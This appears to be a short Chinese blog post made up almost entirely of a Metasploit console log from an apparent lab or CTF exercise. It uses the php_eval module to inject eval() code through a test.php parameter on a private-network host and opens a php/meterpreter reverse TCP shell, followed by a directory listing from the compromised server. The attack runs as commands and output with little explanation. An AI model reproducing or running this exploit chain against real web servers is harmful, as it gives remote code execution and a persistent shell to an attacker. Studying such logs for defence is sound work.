1102 日 , 2020 1:11:48
php/meterpreter/reverse_tcp

use unix/webapp/php_eval
set payload php/meterpreter/reverse_tcp
msf5 exploit(unix/webapp/php_eval) > show options

Module options (exploit/unix/webapp/php_eval):

Name Current Setting Required Description
—- ————— ——– ———–
HEADERS no Any additional HTTP headers to send, cookies for example. Format: “header:value,header2:value2”
Proxies no A proxy chain of format type:host:port[,type:host:port][…]
RHOSTS 172.18.153.29 yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>’
RPORT 50080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URIPATH /test.php?1=!CODE!; yes The URI to request, with the eval()’d parameter changed to !CODE!
VHOST no HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
—- ————— ——– ———–
LHOST 172.18.153.29 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name
— —-
0 Automatic

msf5 exploit(unix/webapp/php_eval) > run

[*] Started reverse TCP handler on 172.18.153.29:4444
[*] Sending request for: http://172.18.153.29:50080/test.php?1=error_reporting%280%29%3beval%28%24_SERVER%5bHTTP_X_BLGDFCAZAWHCYKBYACE%5d%29%3b;
[*] Payload will be in a header called X-BLGDFCAZAWHCYKBYACE
[*] Sending stage (38288 bytes) to 172.18.144.1
[*] Meterpreter session 1 opened (172.18.153.29:4444 -> 172.18.144.1:50849) at 2020-11-02 00:58:32 +0800

meterpreter > ls
Listing: /app
=============

Mode Size Type Last modified Name
—- —- —- ————- —-
100644/rw-r–r– 1024 fil 2020-11-02 00:53:21 +0800 .test.php.swp
100644/rw-r–r– 137 fil 2020-10-28 19:50:22 +0800 index.php
100644/rw-r–r– 4794 fil 2020-10-28 19:39:25 +0800 log.txt
100644/rw-r–r– 48 fil 2020-11-02 00:53:33 +0800 test.php
100755/rwxr-xr-x 2374 fil 2020-10-28 19:37:30 +0800 waf.php
100755/rwxr-xr-x 1247301 fil 2020-10-28 19:34:47 +0800 web.zip
40755/rwxr-xr-x 4096 dir 2020-10-28 15:24:42 +0800 web1
40755/rwxr-xr-x 4096 dir 2020-10-28 15:31:03 +0800 web2
100755/rwxr-xr-x 602431 fil 2020-10-28 19:34:36 +0800 web2.zip

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!